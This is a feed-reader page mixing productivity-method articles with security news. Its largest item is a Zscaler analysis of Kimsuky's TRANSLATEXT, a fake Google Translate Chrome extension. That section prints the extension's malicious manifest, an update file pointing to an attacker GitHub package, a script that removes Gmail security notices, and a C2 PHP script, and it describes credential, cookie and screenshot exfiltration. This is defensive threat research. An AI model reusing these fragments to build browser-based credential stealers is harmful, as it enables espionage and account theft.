Normal view

There are new articles available, click to refresh the page.
Yesterday — 28 June 2024Main stream

My Seven Favorite Productivity Methods in One Efficient List

28 June 2024 at 17:00

A good productivity method can mean the difference between a disorganized, unfulfilling day and one during which you get a lot done and feel great about it. That tradeoff is why so many of these methods, techniques, and hacks exist.

That said, not every productivity method will work for every person. To find the one that works best for you, take a look through this guide to seven of my favorites. Try one that sounds like a strong match for how you think and work (or try to avoid work).


The “Action Method” of productivity

This method is one of my favorites for keeping on task when I’m juggling multiple projects. It calls on you to organize your tasks into three categories: Action steps, references, and back-burners. Once you’ve done that, you put it all into a spreadsheet with those three categories as the column headers. You slot tasks into each column alongside notes, supplemental material, and whatever else you need—and move them around as they change their designations, as what is a back-burner today might be an action step tomorrow. Organizing it all this way helps you keep on top of the most pressing needs.

Here’s a full explanation of how to employ the Action Method. (The “ABC” method is very similar, with “A” tasks being must-do and high-priority, “B” tasks being should-do activities, and “C” tasks being low-priority ones.)


The 3-3-3 productivity method

Using this technique, you aim to plan your day in threes: Spend your first three hours engaging in deep work on your most important project, then complete three other urgent tasks that require less time, and then do three “maintenance” tasks, like answering emails or scheduling other work. This method works because you do your deep, focused work up-front, which gets you in the zone and gives you a sense of accomplishment, which makes tackling the stuff afterward easier.

Here’s a guide to planning your day in threes.


The “Eat the Frog” productivity method

Similar to 3-3-3, the “Eat the Frog” method invites you to tackle work on your biggest, scariest, wartiest task first thing in the morning. Whatever time-intensive task that has kept you up at night is, that’s what you should do first. After that, everything else should be easy. Some proponents argue you should “eat the frog” as soon as you wake up, but this method can work on any schedule as long as you commit to jumping into the hard thing early, enthusiastically, and without hesitation, thus freeing up the rest of your day for other work and lowering your overall stress level.

Here’s a guide to eating your first frog, so to speak.


The Kanban productivity method

Kanban is similar to the Action Method but requires you to label your tasks as to-do, doing, and done. It works best when managed in a spreadsheet or even on a big board with sticky notes, but you need the three columns so you can move whatever is completed into your “done” pile and anything that still needs doing into “to-do.” If you’re a visual person, this is going to be a game-changer, as it helps you easily see what needs to be done, and gives you some satisfaction when you see what you’ve already accomplished piling up under “done.”

Here’s a guide to implementing the Kanban productivity method.


The timeboxing productivity method

Another trick for the visually inclined and motivated, timeboxing requires you to schedule your entire day. Every activity, from answering emails, to working on a big project, to eating a snack, should go on your calendar. It’s much easier to use a digital calendar, like Google Calendar, for this, since so much of the average day is subject to change and it’s simpler to move things around there than in a physical planner, but try not to deviate from the schedule too much. The idea behind this method is that it allows you to plan to devote exactly as much time to each task as you need to complete it while still filling your entire day with activity.

Here’s a guide to getting started with timeboxing.


The Pomodoro productivity technique

This is an old standby that has withstood the test of time because it works so well: Work for 25 minutes on a task, take a short break of about five minutes, and work for 25 minutes again. Every time you complete four 25-minute cycles, take a longer break. This gets you into the groove of working hard in those 25-minute bursts, since you know a little reprieve is coming. The break recharges you and you get back at it, over and over again, until your job is complete. To maximize the benefits of Pomodoro, get a specialized timer so you don't have to set alarms on your phone and can work without glancing at it and all its distracting apps.

Here’s a guide to getting started with the Pomodoro method.


The Results Planning Method (RPM)

This technique comes from famed motivational speaker Tony Robbins, who outlined it in his Time of Your Life program and designed it to be motivational, fast, and efficient. Not only does does the acronym stand for Rapid Planning Method, but it can also serve as a guide to what your day should look like: Results-oriented, purpose-driven, and built around a "massive action plan."

Consistently—every morning or week—ask yourself these three questions:

  1. What do I want?

  2. What is my purpose?

  3. What do I need to do/What is my massive action plan?

By doing this, you connect more to your mission and get more energized about getting to work right away on the answer to the third question, rather than spending a bunch of time deliberating about what you should or shouldn't be doing with your time.

USENIX Security ’23 – PCAT: Functionality and Data Stealing from Split Learning by Pseudo-Client Attack

28 June 2024 at 15:00

Authors/Presenters:Xinben Gao, Lan Zhang

Many thanks to USENIX for publishing their outstanding USENIX Security ’23 Presenter’s content, and the organizations strong commitment to Open Access.
Originating from the conference’s events situated at the Anaheim Marriott; and via the organizations YouTube channel.

The post USENIX Security ’23 – PCAT: Functionality and Data Stealing from Split Learning by Pseudo-Client Attack appeared first on Security Boulevard.

Use 'RPM' to Structure Your Day More Efficiently

28 June 2024 at 14:30

Figuring out how to structure your days so they're as productive as possible is hard, not to mention sticking to such a routine going forward. This is where RPM can help. The Rapid Planning Method, or RPM, can help you streamline your daily planning process and get started working on your action steps sooner, making you more productive overall. And since RPM is fairly straightforward, you're more likely to stick with it.

What is the Rapid Planning Method (RPM)?

This technique comes from famed motivational speaker Tony Robbins, who outlined it in his Time of Your Life program. Robbins may have a slightly cheesy rep, but RPM has the goods: Not only does does the acronym stand for Rapid Planning Method, but it can also serve as a guide to what your day should look like: Results-oriented, purpose-driven, and featuring a massive action plan.

It starts with asking yourself three questions consistently—every morning, for instance, or every week:

  1. What do I want?

  2. What is my purpose?

  3. What do I need to do/What is my massive action plan?

You can write down your answers or just keep them in mind, but they're intended to drive you forward into action that will be efficient and lead to accomplishing your ultimate goal. (For best results, I recommend writing the answers down in a planner, so you can stick your guiding principles somewhere you'll continually see them.)

How RPM makes you more productive

There are a whole lot of productivity methods out there—and the benefit of RPM is that it can be easily combined with many of them. For example, you can implement a 1-3-5 to-do list as part of your overall action plan. The defining feature of RPM is that it keeps your goals and desires front and center, giving you something to strive for. and organize your actions around. Just by keeping that central plan in mind, you can weed out what isn't important and highlight what you want to prioritize, all without a lot of time-wasting deliberation.

Like using SMART goals, using RPM infuses your daily tasks with a sense of purpose or a mission, helping you stay focused and engaged.

Liquidmatrix Security Digest Podcast – Episode 7A

28 June 2024 at 13:52

Episode 0x7A 4-peat 4-peat! Turns out this is actually habit forming. The weekly venting/ranting is excellent for the spirit! Hope you’re able to vent as well. Feel free to scream while listening – it’s not weird at all. Upcoming this week… Lots of News Breaches SCADA / Cyber, cyber… etc. finishing it off with DERPs/Mailbag […]

The post Liquidmatrix Security Digest Podcast – Episode 7A appeared first on Liquidmatrix Security Digest.

The post Liquidmatrix Security Digest Podcast – Episode 7A appeared first on Security Boulevard.

💾

USENIX Security ’23 – Extracting Training Data from Diffusion Models

28 June 2024 at 11:00

Authors/Presenters:Nicholas Carlini, Jamie Hayes, DeepMind; Milad Nasr Matthew Jagielski, Vikash Sehwag, Florian Tramèr, Borja Balle, Daphne Ippolito, Eric Wallace

Many thanks to USENIX for publishing their outstanding USENIX Security ’23 Presenter’s content, and the organizations strong commitment to Open Access.
Originating from the conference’s events situated at the Anaheim Marriott; and via the organizations YouTube channel.

Permalink

The post USENIX Security ’23 – Extracting Training Data from Diffusion Models appeared first on Security Boulevard.

The Eureka Moment: Discovering Application Traffic Observability

28 June 2024 at 12:00

If you’ve been part of a network segmentation or Zero Trust architecture planning project or a data center or application migration initiative, the following scenario probably rings true.

The post The Eureka Moment: Discovering Application Traffic Observability appeared first on Netography.

The post The Eureka Moment: Discovering Application Traffic Observability appeared first on Security Boulevard.

Elevating Cloud Security: Highlights from CloudNativeSecurityCon 2024

28 June 2024 at 10:08

Explore insights from CloudNativeSecurityCon 2024, including securing machine identities, digesting SLSA and GUAC, and the impact of quality documentation.

The post Elevating Cloud Security: Highlights from CloudNativeSecurityCon 2024 appeared first on Security Boulevard.

Cybersecurity Insights with Contrast SVP of Cyber Strategy Tom Kellermann | 6/28

Insight #1

Most ransomware deploys a remote-access Trojan (RAT), which allows for secondary infections to occur and enables access to victims’ networks to be sold in Darkweb forums.

 

Insight #2

Most ransomware is delivered initially through the exploitation of a vulnerability. Runtime Security can mitigate this: It’s a highly effective exploit prevention for zero days, unknown vulnerabilities and a broad array of exploit techniques.

 

Insight #3

Large Language Model s (LLMs) can be poisoned and forced to hallucinate via a myriad of application attacks.  See OWASP's Top 10 for LLM (PDF).  

Artificial Intelligence (AI) has a dark passenger. 

The post Cybersecurity Insights with Contrast SVP of Cyber Strategy Tom Kellermann | 6/28 appeared first on Security Boulevard.

AppViewX AVX ONE Certificate Lifecycle Management Integration With HashiCorp Vault

28 June 2024 at 07:59

HashiCorp Vault is a robust and versatile open-source solution for comprehensive secrets management and data protection. At its core, HashiCorp Vault excels in securely storing and managing sensitive information, employing dynamic secrets to minimize the risk of long-lived credentials. Its flexible authentication methods, ranging from tokens and LDAP to username/password, empower organizations to implement strong […]

The post AppViewX AVX ONE Certificate Lifecycle Management Integration With HashiCorp Vault appeared first on Security Boulevard.

Introduction to NTA Auto-learning Function

By: NSFOCUS
28 June 2024 at 05:06

The implementation of DDoS attack alerting relies on setting alert thresholds. Setting the threshold too high may result in false negatives, while setting it too low may lead to a high number of false positives. Therefore, it is crucial to establish appropriate thresholds. NTA provides automatically learn, record, and analyze network traffic from the IP […]

The post Introduction to NTA Auto-learning Function appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

The post Introduction to NTA Auto-learning Function appeared first on Security Boulevard.

Overhaul Your To-Do List With the 'ABCDE' Method

28 June 2024 at 08:00

A major component of productivity is prioritizing your daily responsibilities, which is why to-do lists are so important. Usually, I suggest using the Eisenhower Matrix, which helps you visually sort tasks according to how urgent and important they are, but there is another way: The ABCDE method, which comes from Eat That Frog!: 21 Great Ways to Stop Procrastinating and Get More Done in Less Time by Brian Tracy. Obviously, eating the frog—or doing your biggest, most demanding task first—is one way to tackle the day’s duties, but structuring out how you’ll do the rest is pretty important, too. Here’s how it works.

What is the ABCDE method of productivity?

The ABCDE method is a simple way to categorize whatever you need to do. Using it can be a solid first step to making your to-do list, especially if you’re following a model like the 1-3-5 list, which requires you to do one major task, three medium-sized ones, and five small ones every day. Figuring out the big, medium, and small tasks is actually a task in itself (but it doesn’t count as one of the five, sorry). 

When you are planning out your day, you’re going to give each task in front of you a grade. First, list out everything you need to do. This can be a list of your tasks for the day, week, or month—you’ll weed it all down eventually. Then, give them each a grade based on this outline:

  • A is for the most important tasks, like anything that will have a consequence if it doesn’t get done. These are those “frog” tasks that will require resources and time, but they can also be something that doesn’t take a lot of time but does have a hefty associated punishment for failure, like paying a bill on time. 

  • B tasks are ones that also need to get done, but won’t have such serious ramifications if they’re not done immediately. You know you need to do them at some point (lest they escalate to the urgency of an A task) but you have a little wiggle room.

  • C tasks don’t have any consequences for not getting done, but are things it would be good to get taken care of. For me, a C task might be responding to a PR pitch to say I’m not interested in interviewing their client. I didn’t need to do it, but it’s a nice thing to do that keeps a professional relationship friendly. (Conversely, a B task would be responding to someone’s publicity agent right away when they’re trying to nail down a time for an interview. An A task would be doing the interview.)

  • D tasks are anything that you can delegate to someone else. The person you give it to shouldn’t have any A or B tasks it will take away from; it should become a priority for them, even if it’s not major for you or simply something you trust they’ll get done right. 

  • E tasks are ones you eliminate altogether. If they serve absolutely no purpose, have no consequences attached to them, or may even pull you off course or be a detriment, just don’t do them. This is a pretty relative grade, though: Say you wanted to go to the grocery store tonight but just don’t have time. You have enough food at home or could order takeout. It’s fine to eliminate it this time, but when you deplete all your food, the grocery store trip will roar back onto the list in a higher position. Other E tasks may never reappear; they’re just inconsequential. Ignore them to reduce pressure on yourself. 

Bear in mind this should be a little subjective. There are other, more intense ways of categorizing your daily tasks and if you're struggling with giving your responsibilities a grade, you might need to try something a little more data-focused. The goal here is to be quick and efficient so you can stop stressing about what needs to be done, prioritize it, and just start doing it.

Use the ABCDE grades to be more productive

Once every task has been assigned a grade, start planning out your day (and week and month). Here’s where that 1-3-5 to-do list comes in: The one big task should be an A task, something that is urgent and timely, and/or requires major resources and focus. The three medium-sized tasks might include a smaller A-level one, but will most likely be Bs. For the five smaller tasks, pick up any leftover B grades and, if you want, Cs. As for the D-level things, outsourcing and coordinating on them might still require enough work to qualify carrying out the delegation as one of your five smaller tasks, but it depends how much effort that really takes and what the rest of your day is looking like. Don’t shoot the messenger, but you might have to fall back on a C task to get the delegation taken care of. 

The E grades can just be crossed off. Go ahead and delete them or strike them out. It’ll feel good (and productive) to get that finality on them. 

Once you’ve organized which tasks are necessary for the day, look ahead at the week and make sure you keep any B-level responsibilities in mind and roll them over to a day that works for you if you don’t have time that particular day. Putting them off will turn them into As pretty quickly. 

As always, rely on timeboxing to schedule out the day from there. Allocate time for each task in your calendar, giving yourself the most time for major A-level duties and less and less time for B and C. Don’t multitask; instead, do each thing in order, starting by eating the frog and moving through the other things one at a time until they’re done. (The exception here is that if you’re delegating tasks, try to get it done early so the other person has time to complete what should be an A- or B-level job for them, too.)

Grading your responsibilities is an easy way to get perspective on them and enhance your sense of urgency around them, which compels you to be more productive. Getting it all into an ordered list gives you structure and direction, wastes less time throughout the day, and will give you a sense of accomplishment when you’re done, which itself is a productivity win.

Kimsuky deploys TRANSLATEXT to target South Korean academia

27 June 2024 at 16:32

IntroductionIn March 2024, Zscaler ThreatLabz observed new activity from Kimsuky (aka APT43, Emerald Sleet, and Velvet Chollima), an advanced persistent threat actor backed by the North Korean government. This group, first observed in 2013, is notorious for cyber espionage, and financially motivated cyber attacks, primarily targeting South Korean entities, including think tanks, government institutions, and the academic sector. They employ various tactics, techniques, and procedures (TTPs) in their targeted campaigns and one of their distribution methods is malicious Google Chrome extensions. In July 2022, it was reported that Kimsuky used malicious Chrome extensions to target users in the U.S., Europe, and South Korea. While actively monitoring this group, we discovered an instance where Kimsuky used a new Google Chrome extension, which we named “TRANSLATEXT”, for cyber espionage. TRANSLATEXT is specifically leveraged to steal email addresses, usernames, passwords, cookies, and captures browser screenshots.Key TakeawaysKimsuky uploaded TRANSLATEXT to their attacker-controlled GitHub repository on March 7, 2024.TRANSLATEXT can bypass security measures for several prominent email service providers like Gmail, and Kakao and Naver (popular in South Korea) to steal information.TRANSLATEXT is specifically leveraged to steal email addresses, usernames, passwords, cookies, and captures browser screenshots.Our research suggests that the main targets of this attack were in the South Korean academic field, specifically those involved in political research related to North Korean affairs. Technical AnalysisAccording to a recent publication by a South Korean security vendor, Kimsuky delivered an archive file named “한국군사학논집 심사평서 (1).zip”, which translates to "Review of a Monograph on Korean Military History." The archive contains two decoy files: HWP documents (a popular office file format in South Korea) A Windows executable masquerading as related documents When a user launches the executable, the malware retrieves a PowerShell script from the threat actor’s server. The figure below shows the Kimsuky infection chain.Figure 1: Example Kimsuky infection chain.The PowerShell script from the remote server is responsible for uploading general information about the victim and creating a Windows shortcut that retrieves an additional PowerShell script from the same server. During our own research into this campaign, we discovered another PowerShell script with the MD5 hash: bba3b15bad6b5a80ab9fa9a49b643658 and a GitHub account used by the script linked to the same actor. From this newly discovered GitHub account, we observed victim data and a previously deleted Chrome extension utilized by the actor. The delivery method for TRANSLATEXT is not currently known.However, the newly discovered PowerShell script reveals that Kimsuky checked for the presence of installed Chrome extensions using the Windows registry key shown below: HKCU\Software\Policies\Google\Chrome\ExtensionInstallForcelistThis registry key is used by Chrome to enforce the installation of specified extensions without user permission or intervention. Therefore, it appears Kimsuky registered TRANSLATEXT in this registry key using previous stage methods.TRANSLATEXT analysisIn the attacker-controlled GitHub account, we observed an XML file in addition to TRANSLATEXT. These files were present in the repository on March 7, 2024, and deleted the next day, implying that Kimsuky intended to minimize exposure and use the malware for a short period to target specific individuals. The figure below shows how Kimsuky uploaded the files on March 7th to one of their GitHub accounts and then deleted them on March 8th.Figure 2: Kimsuky GitHub commit log shows the addition and removal of an XML file and TRANSLATEXT after only one day.A timeline of the GitHub user’s activity is listed below:February 13, 2024: Join GitHubMarch 7, 2024: Created first repository named “motorcycle”29 commits including uploads from the victim and subsequent removals.Added TRANSLATEXT files: update.xml, GoogleTranslate.crxMar 8, 2024: Removed update.xml and GoogleTranslate.crxMar 18, 2024: Created motorcycle/calcApr 4, 2024: Created a motorcycle/laxi/ter.txt that contains “sfsadfsadfa”. As the name suggests, the update.xml file contained the parameters necessary for updating TRANSLATEXT as shown below.<?xml version='1.0' encoding='UTF-8'?>
<gupdate xmlns='http://www.google.com/update2/response' protocol='2.0'>
<app appid='gibabegbpcndhaoegbalnmgkeoaopajp'>
<updatecheck codebase='hxxps://github[.]com/cmastern/motorcycle/raw/main/GoogleTranslate.crx' version='1.5.2' />
</app>
</gupdate>TRANSLATEXT was uploaded to GitHub as “GoogleTranslate.crx”, and masqueraded as a Google Translate extension. However, TRANSLATEXT actually contained four malicious Javascript files for bypassing security measures, stealing email addresses, credentials, cookies, capturing browser screenshots, and exfiltrating stolen data. The figure below depicts the role of each Javascript file in stealing and sending information to the C2 server.Figure 3: Kimsuky TRANSLATEXT architecture.According to the manifest.json file, the author name is listed as “Piano”, and the update_url points to another GitHub address referencing an update.xml file that did not exist at the time of our analysis. The description and default title fields contain Korean, which likely indicates that this campaign was specifically targeting South Korea–we discuss this later in the blog.A part of the manifest.json file is shown below.{
// Required
"author": "Piano",
"manifest_version": 3,
"name": "Google Translate",
"version": "1.5.2",

// Recommended
"action": {
"default_icon": "icons/16.png",
"default_title": "번역하려면 마우스 왼쪽 버튼을 클릭하세요."
},
"description": "웹을 탐색하면서 편하게 번역을 볼 수 있습니다. 이 기능은 Google 번역팀에서 제공합니다.",
"icons":{
"16": "icons/16.png",
"19": "icons/19.png",
"32": "icons/32.png",
"38": "icons/38.png",
"48": "icons/48.png",
"128": "icons/128.png"
},
"update_url": "https://raw.githubusercontent.com/HelperDav/Web/main/update.xml",

// Optional
"background": {
"service_worker": "background.js"
},
"content_security_policy": {
"extension_page": "script-src 'self' 'wasm-unsafe-eval'; object-src 'self'"
},
"permissions": ["tabs", "activeTab", "cookies", "storage", "downloads", "scripting"],
The TRANSLATEXT manifest requests excessive permissions such as scripting. This broad permission allows TRANSLATEXT to inject scripts into web pages, enabling it to modify page content, add functionality, and/or interact with the page's elements.Depending on the URL the victim visits, a corresponding script is launched. When the victim visits the Naver login page (nid.naver.com/*) or the Kakao login page (accounts.kakao.com/*), the auth.js file is injected into the web page. Similarly, when visiting the Gmail login page (mail.google.com/), the gsuit.js file is injected into the web page. The content.js script is injected into all web pages using the manifest file as shown below."content_scripts": [
{
"js": [ "content.js"],
"matches": [
"http://*/*", "https://*/*"
],
"run_at": "document_idle",
"all_frames": false
},
{
"js": [ "auth.js"],
"matches": [
"https://nid.naver.com/*",
"https://accounts.kakao.com/*"
],
"run_at": "document_end",
"all_frames": false
},
{
"js": [ "gsuit.js"],
"matches": [
"https://mail.google.com/*"
],
"run_at": "document_end",
"all_frames": false
}
]Security bypassThe script injected into the web page is responsible for bypassing security measures on each specific login page. Note: For security reasons, we've replaced sensitive variable names in the script to prevent unauthorized actors from exploiting these methods. The gsuit.js script searches for all <div> elements with the specific class name in the web page and then removes them from the Document Object Model (DOM) as shown below."use strict";
function NeverNotify()
{
var x = document.querySelectorAll("[redacted]");
for(var i=0; i<x.length; i++)
{
if(x[i])
{
x[i].remove();
}
}
}
setInterval(() => {NeverNotify();}, 50);The auth.js script is used for manipulating security measures for Naver and Kakao. To bypass Kakao, the script checks for elements with specific IDs. If these elements exist, the script clicks them. This action typically means opting to remember the browser to avoid repeated security prompts. The script selects all elements and ensures their class names are set correctly, possibly to ensure all checkboxes of this type are checked. The Naver section of the script, similar to the Kakao section, identifies elements with specific IDs and performs clicks on them. These clicks serve various purposes, such as skipping or acknowledging waiting times and dialogs within Naver's security measure process. For instance, it locates an element with the ID auto and sets its value to init, potentially as part of a setup or initialization process for the authentication page. Note: We have notified the Google and Naver security teams about these security bypasses and are closely working with them to mitigate the issue.Email address stealer - content.jsThe main objective of this Javascript file is to collect email address and password data entered into the forms and send the information to a background page. The script performs these actions as follows:Hooking into various form elements such as buttons and input fields to capture clicks and keypresses to initiate sending data.Collecting all email addresses entered into any input fields (“type=email”), general text (“type=text”), or textboxes (“role=textbox”), and concatenating them into a single string. Collecting values from all input fields of the type password, and concatenating the email address and password data collected into a string format suitable for transmission.Monitoring user actions, like pressing Enter, by adding event listeners to various button types and input fields. It uses a mutex variable to prevent multiple transmissions at the same time. This monitoring process is repeated every 500 milliseconds, ensuring new elements on the page or dynamically added elements are also monitored.Service worker - background.jsThe Javascript employs the dead drop resolver technique to retrieve configurations and commands from the public blog service: hxxps://onewithshare.blogspot[.]com/2023/04/10.htmlIf the blog URL is active, the Javascript extracts the pattern with the following regular expression: <input name="${name}" type="hidden" value="(.*?)"> This parses the content from the value parameter of a hidden input field. When we checked the threat actor’s blog, there were no relevant values present in this format. There are four types of commands expected by the code, and they are described in the table below:CommandDescriptionURLParses and Base64 decodes the value and appends /log.php. This newly formed URL is used as a new C2 server.CaptureWhen a new tab is created, the code sends the current time and URL of the tab, taking a screenshot of the tab with chrome.tabs.captureVisibleTab API every 5 seconds.delcookieRemoves all cookies from the browser.RunInjects a <a> tag with the href value ms-powerpoint:// in all Chrome tabs, invoking the click event every 30 minutes.Table 1: Commands supported by Kimsuky’s TRANSLATEXT.The background script also registers several listeners with specific functionality as described below:Send background Javascript listener: This listener is triggered when a new message is created, allowing for appropriate actions to be taken in response.Tab update listener: When a tab is updated, this listener sends the URL of the newly created tab along with a screenshot, based on the presence of the Capture flag.Cookie change listener: Whenever a cookie is modified, this listener checks if the domain includes google, naver, kakao, or daum, and if the reason for the change is expired, evicted, or explicit. In such cases, the new cookie value is sent to the remote C2 server.TRANSLATEXT uses HTTP POST requests for C2 communications, with the following hardcoded HTTP headers:Accept: application/json, application/xml, text/plain, text/html, *.*,
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Access-Control-Allow-Origin: "*"
Access-Control-Allow-Credentials: trueTRANSLATEXT uses the following HTTP POST fields for sending the stolen information.Data to SendPOST Data FormatEmail/passwordevent=[current time]-->event=[url]event=email=[email]**pwd=[passwd] New tab imagetab=[current time]-->tab=[url]image=[image data]&url=[tab url]Cookie (send all cookies)cookie=[current time]-->cookie=[all cookie value]Cookie (cookie changed)cookie={expired|evicted|explicit}:[current time]-->cookie=[cookie value]Table 2: HTTP POST data format for Kimsuky’s TRANSLATEXT.VictimsThe data stolen by the threat actor included browser login data and cookies. One of the victims is in the education sector in South Korea. Based on this gathered information, we surmise that academic researchers specializing in the Korean peninsula, particularly those engaged in geopolitical matters involving North Korea, are among the primary targets of this campaign. Threat AttributionConsidering the C2 characteristics and victimology, we attribute this attack to the Kimsuky group with medium confidence. C2 server characteristicsFrom the threat actor's server, we discovered the presence of a b374k webshell (hxxps://webman.w3school.cloudns[.]nz/config.php) used for exfiltrating stolen information. The Kimsuky group has a history of frequently utilizing the b374k webshell.Furthermore, the main page of the threat actor's server redirects clients to the legitimate Gmail page when they connect without any parameters. This behavior aligns with the characteristic C2 configuration of the Kimsuky group. This redirection to well-known and trusted services like Gmail, Naver, or Kakao helps to lower suspicion and avoid sending informative configurations. As an example below, we show an old PHP script from the Kimsuky group's C2 server that captures the client's IP address and redirects the client's connection to Gmail using the Location header.<?php
date_default_timezone_set('Asia/Seoul');
$Now_time = time();
$date = date("Y-m-d-h-i-s-A",$Now_time);
$ip = getenv("REMOTE_ADDR");
if(isset($_GET['ip'])){
$szfilename = "allow.txt";
$pfile = fopen($szfilename,"ab");
$res= $_GET['ip'] . "\r\n" ;
fwrite($pfile,$res);
fclose($pfile);
exit;
}
$szfilename = "error.txt";
$pfile = fopen($szfilename,"ab");
$res= $date . "-" . "\r\n".$ip . "\r\n" . $_SERVER['HTTP_USER_AGENT']."\r\n";
fwrite($pfile,$res);
fclose($pfile);
header('Location: https://mail.google.com');
?>Employing “r-e.kr” domainsFrom the newly discovered PowerShell script, we found that the actor used the domain "r-e[.]kr" to host the malicious PowerShell scripts. The r-e.kr domain was registered by a Korean ISP named “viaweb”. Domain itemDetailsDomain Namer-e.krRegistranthyon jin parkAdministrative Contact (AC)Hyonjin ParkAC E-Mail Registered Date2014. 03. 22.Last Updated Date2022. 11. 22.Expiration Date2025. 03. 22.PublishesNAuthorized Agencyviaweb(http://viaweb.co.kr)Table 3: Kimsuky domain details.Historically, the Kimsuky group has frequently abused this domain, according to other security vendors. In addition to the r-e.kr domain, they have used similar domains registered with the same provider, such as p-e.kr and o-r.kr. While the overlap of specific domains is common, these types of domains are not well-known, and we believe that only a few threat actors prefer using them.VictimologyDuring our research, we identified a specific victim of this attack, an academic with a keen interest in geopolitical issues pertaining to the Korean peninsula. One of the primary objectives of the Kimsuky group is to conduct surveillance on academic and government personnel in order to gather valuable intelligence. Hence, the characteristics exhibited by this campaign are consistent with the intentions of Kimsuky.ConclusionOur research indicates that malicious Google Chrome extensions continue to be leveraged by Kimsuky. The group appears to be targeting academia in South Korea as part of an ongoing intelligence collection campaign. To mitigate the risk from active North Korea-affiliated threat actors like Kimsuky, it is imperative to stay informed about their latest tactics. Additionally, exercising caution when installing programs from untrusted sources is essential in maintaining security and preventing potential breaches.Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to TRANSLATEXT at various levels with the following threat names:Win32.Backdoor.Cobaltstrike.LZJS.Trojan.KimsukyPS.Trojan.KimsukyIndicators Of Compromise (IOCs)IndicatorsDescriptionbba3b15bad6b5a80ab9fa9a49b643658PowerShell script (tys.txt).38e27983c757374d9bae36a2e2520e8eTRANSLATEXT (GoogleTranslate.crx).hxxp://sdfa.liveblog365[.]com/ares/hades.txtPowerShell script download URL.hxxp://sdfa.liveblog365[.]com/ares/babyhades.txtPowerShell script download URL.hxxp://ney.r-e[.]kr/mar/tys.txtScript download URL.hxxp://ney.r-e[.]kr/mar/tys.phpScript download URL.hxxps://webman.w3school.cloudns[.]nzC2 domain to exfiltrate data.hxxps://onewithshare.blogspot[.]com/2023/04/10.htmlBlog for dead drop resolver.hxxps://raw.githubusercontent[.]com/HelperDav/Web/main/update.xmlThreat actor’s GitHub.hxxps://github[.]com/cmasternThreat actor’s GitHub. MITRE ATT&CK FrameworkIDTacticDescriptionT1059.001Command and Scripting Interpreter: PowerShellThreat actor uses PowerShell script to collect general system information, and uploads it to GitHub.T1176Browser ExtensionsThreat actor utilizes TRANSLATEXT for exfiltration and persistence.T1555.003Credentials from Password Stores: Credentials from Web BrowsersThreat actor exfiltrates credentials stored in the browser to GitHub.T1113Screen CaptureTRANSLATEXT captures new browser tabs.T1071.001Application Layer Protocol: Web ProtocolsHTTP protocol to fetch the payload and then upload exfiltrated data.T1102.001Web Service: Dead Drop ResolverTRANSLATEXT receives commands from the legitimate blog post.T1041Exfiltration Over C2 ChannelSends collected email address and password through C2 channel.

The post Kimsuky deploys TRANSLATEXT to target South Korean academia appeared first on Security Boulevard.

Why WAF Rate Limiting isn’t Enough | Impart Security

27 June 2024 at 14:00

Some WAFs in the market offer rate limiting features designed to stop automated API attacks. They do this by implementing a centralized control plane with shared state and counters in the cloud to enable over time detections. However, these solutions still struggle with the unique challenges posed by API attacks, leaving customers frustrated enough to post about in on reddit:

Customers complaining about WAF rate limiting

The problem with many WAFs is that they are not architected to handle high volumetric attacks because they are over-reliant on a cloud control plane. Let's take an example of a typical legacy agent based WAF based on this type or architecture:

Limitations of centralized control plane

Cloud based detections are too slow

First, WAF agents rely on the cloud to detect attacks.  WAF agents are thin clients - they run some basic detections and then forward metadata to the cloud in order to optimize for performance and latency.  However, this approach means that any behavioral based detections (again, going back to the credential stuffing example) can only be detected in the cloud, and not locally at the agent because the agent does not have state or awareness of what is happening.  Attackers can take advantage of this type of system by sending attacks in at high rates in a distributed manner, getting in high volumes of attacks before the agents can check in with the cloud.

The Cloud is a single point of failure

Second, legacy agents have a single point of failure when it comes to detection - the cloud.  Because all the state is stored in the cloud, if the cloud goes down then all behavioral based detections stop working as well, as does any blocking and threat mitigation of these types of attacks.

Impart has decentralized the agent

We designed Impart from the ground up to solve these problems using a next generation decentralized architecture - an agent mesh.  Unlike traditional distributed systems which utilize a hub and spoke architecture (centralized control plane, distributed data plane), Impart is designed as a completely decentralized system that does not require a central control plane.

Instead of using centralized cloud communications to share and distribute state, our agents can share state directly with each other, as well as with the cloud.  The agents can also elect a leader to check in with the cloud so that not every agent has to update the cloud with the shared state, which is more efficient from a load perspective.

Decentralized Rate Limiting is faster and more reliable

What this means for security teams is two things:

Faster detection and response

First, Impart is able to detect and respond to attacks much more quickly than solutions based on legacy agents because we are not reliant on a round trip check in with the cloud to share state. In the example provided above, when a single inspector (our agent) detects an attack, it immediately shares this information with other agents in it's group. This allows all the agents to know when a single agent is experiencing an attack, and drastically reduces the time to detect an attack such as credential stuffing.

This matters in the real world.  Credential stuffing attacks are typically rapid, with attackers using off-the-shelf automation tools to generate and send numerous requests in a short time. Speed of detection is crucial in these scenarios.  In a recent deployment, Impart was deployed alongside a legacy agent based WAF and found that the it was not identifying or respond to prolonged attacks quickly enough. Thousands of credential stuffing attacks per hour slipped through before the  legacy agent based WAF could react, whereas Impart identified and acted on these attacks almost immediately.

Improved resilience and availability

Second, Impart is able to withstand an outage to the cloud without impacting behavioral detections, or reporting and analytics.  If the cloud has a problem, detections continue with all relevant metrics being captured and shared amongst all of the agents.  Whenever the cloud returns to normal, all of that shared state can be backfilled by the agents to the cloud, or sent locally by those agents to the customer's SIEM. This matters because most enterprises don't want to pin the reliability of their security tooling to the reliability of a single cloud provider. With this type of architecture, a customer's detection and response capabilities remain intact no matter what is going on in their WAF's control plane.

Reflecting on our journey at Impart, it's clear that the landscape of API security requires innovative solutions. Traditional WAFs, with their cloud-dependent architectures, simply can't keep up with the fast-paced, automated nature of modern API attacks. Our distributed control plane approach not only accelerates detection and response times but also ensures resilience even during cloud outages. It's been incredibly rewarding to see how our solution makes a real difference in protecting businesses from API threats.

If you want to learn more about our unique approach, sign up for a demo today!

Subscribe to newsletter

Want to learn more about API security? Subscribe to our newsletter for updates.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

The post Why WAF Rate Limiting isn’t Enough | Impart Security appeared first on Security Boulevard.

News Alert: Infinidat introduces advanced cyber resiliency and recovery solution for enterprises

27 June 2024 at 18:14

Waltham, Mass., June 27, 2024, CyberNewsWire — Infinidat, a leading provider of enterprise storage solutions, has introduced a new automated cyber resiliency and recovery solution that will revolutionize how enterprises can minimize the impact of ransomware and malware attacks.… (more…)

